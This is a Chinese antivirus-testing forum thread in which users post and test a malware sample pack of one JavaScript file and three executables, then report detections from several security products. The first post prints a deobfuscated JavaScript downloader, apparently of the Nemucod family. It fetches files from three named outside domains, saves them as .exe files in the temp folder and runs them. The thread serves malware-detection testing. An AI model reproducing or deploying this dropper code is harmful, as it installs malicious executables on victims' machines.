1 JS 3 EXE

显示全部楼层 · 发表于 2016-2-4 11:36:23

本帖最后由轩夏于 2016-2-4 11:38 编辑

JS

解密后
[mw_shl_code=javascript,true]var b = "geniestation.com www.jfxonline.com tessobrien.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "147701";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
for (var i = ld; i < b.length; i++) {
      var dn = 0;
      try {
         xo.open("GET", "http://" + b + "/counter/?id=" + a4 + "&rnd=920416" + n, false);
         xo.send();
         if (xo.status == 200) {
            xa.open();
            xa.type = 1;
            xa.write(xo.responseBody);
            if (xa.size > 1000) {
                  dn = 1;
                  xa.position = 0;
                  xa.saveToFile(fn + n + ".exe", 2);
                  try {
                     ws.Run(fn + n + ".exe", 1, 0);
                  } catch(er) {};
            };
            xa.close();
         };
         if (dn == 1) {
            ld = i;
            break;
         };
      } catch(er) {};
};
};[/mw_shl_code]

成功下载3个exe

显示全部楼层 · 发表于 2016-2-4 11:39:23

Kaspersky
Internet Security
ACCESS DENIED
The requested URL cannot be provided

Object URL:

https://att.kafan.cn/forum.php?mo ... Dk3NTc3MnwxOTYxNzQ1

Reason:

The object is infected by HEUR:Exploit.Script.Generic
Message generated on: 2016/2/4 11:37:44

Kaspersky
Internet Security
ACCESS DENIED
The requested URL cannot be provided

Object URL:

https://att.kafan.cn/forum.php?mo ... Dk3NTc3MnwxOTYxNzQ1

Reason:

The object is infected by Trojan.Win32.Kovter.ddj
Message generated on: 2016/2/4 11:37:54

JS玩年啊(* ￣3)(ε￣ *)
多个样本打包还是加个密吧，要不然就得关掉网页反病毒然后再打开。

显示全部楼层 · 发表于 2016-2-4 11:44:43

显示全部楼层 · 发表于 2016-2-4 12:03:54

本帖最后由 windows7爱好者于 2016-2-4 12:17 编辑

JS两次联网，成功下载一个EXE。DPH击杀
599样本2KB，死的
ab7eaa18f样本试图联网，我允许，我等着看会下载什么东西，等了半天，程序报错退出

d1a6 样本 DPH击杀

显示全部楼层 · 发表于 2016-2-4 12:12:59

mcafee
JS/Nemucod.bi

显示全部楼层 · 发表于 2016-2-4 12:56:05

ess9

显示全部楼层 · 发表于 2016-2-4 12:56:21

icedream89 发表于 2016-2-4 12:56

抽风- -二连了

显示全部楼层 · 发表于 2016-2-4 12:57:29

火绒

显示全部楼层 · 发表于 2016-2-4 13:00:30

威胁名称;"状态";"检测时间";"对象类型";"进程"
特洛伊木马 Inject3.ZPE, c:\Users\wuliao\Desktop\桌面\ab7eaa18f.gif;"已保护";"2016/2/4, 12:57:15";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"
特洛伊木马 Inject3.ZPE, c:\Users\wuliao\Desktop\桌面\ab7eaa18f.gif;"已保护";"2016/2/4, 12:57:15";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"
特洛伊木马 Inject3.ZNT, c:\Users\wuliao\Desktop\桌面\d1a6.gif;"已保护";"2016/2/4, 12:57:14";"文件或目录";"c:\Windows\System32\SearchProtocolHost.exe"

显示全部楼层 · 发表于 2016-2-4 13:02:51

[病毒样本] 1 JS 3 EXE

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块